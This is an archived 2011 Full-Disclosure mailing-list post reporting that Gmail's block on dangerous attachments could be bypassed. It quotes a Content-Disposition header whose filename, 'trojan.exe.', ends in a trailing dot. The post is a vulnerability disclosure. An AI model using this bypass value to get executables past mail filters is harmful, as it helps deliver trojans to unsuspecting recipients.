'[Full-disclosure] Gmail dangerous attachment type bypass'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] Gmail dangerous attachment type bypass
From:       WooYun <root () wooyun ! org>
Date:       2011-10-29 3:31:20
Message-ID: CACFkvQq_rSR2N8WP4H8EbA8ekuvY=ewTfynr9h0wyBQAjeHMGw () mail ! gmail ! com
[Download RAW message or body]

[Attachment #2 (multipart/alternative)]


Hi

Someone report this on wooyun

http://www.wooyun.org/bugs/wooyun-2010-03139

Just use

Content-Disposition: attachment;
filename="trojan.exe."

can bypass gmail security check

:)

[Attachment #5 (text/html)]

Hi<div><br></div><div>Someone report this on wooyun</div><div><br></div><div><a \
href="http://www.wooyun.org/bugs/wooyun-2010-03139">http://www.wooyun.org/bugs/wooyun-2010-03139</a></div><div><br></div><div>Just \
use </div><div> <br></div><div><span class="Apple-style-span" style="font-family: Verdana, \
&#39;Microsoft YaHei&#39;, Helvetica, Arial, sans-serif; font-size: 13px; line-height: 25px; \
background-color: rgb(255, 255, 255); ">Content-Disposition: attachment;<br style="margin-top: \
0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding-top: 0px; padding-right: \
0px; padding-bottom: 0px; padding-left: 0px; "> \
filename=&quot;trojan.exe.&quot;</span></div><div><span class="Apple-style-span" \
style="font-family: Verdana, &#39;Microsoft YaHei&#39;, Helvetica, Arial, sans-serif; \
font-size: 13px; line-height: 25px; background-color: rgb(255, 255, 255); "><br> \
</span></div><div><span class="Apple-style-span" style="font-family: Verdana, &#39;Microsoft \
YaHei&#39;, Helvetica, Arial, sans-serif; font-size: 13px; line-height: 25px; background-color: \
rgb(255, 255, 255); ">can bypass gmail security check</span></div> <div><span \
class="Apple-style-span" style="font-family: Verdana, &#39;Microsoft YaHei&#39;, Helvetica, \
Arial, sans-serif; font-size: 13px; line-height: 25px; background-color: rgb(255, 255, 255); \
"><br></span></div><div><span class="Apple-style-span" style="font-family: Verdana, \
&#39;Microsoft YaHei&#39;, Helvetica, Arial, sans-serif; font-size: 13px; line-height: 25px; \
background-color: rgb(255, 255, 255); ">:)</span></div>



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic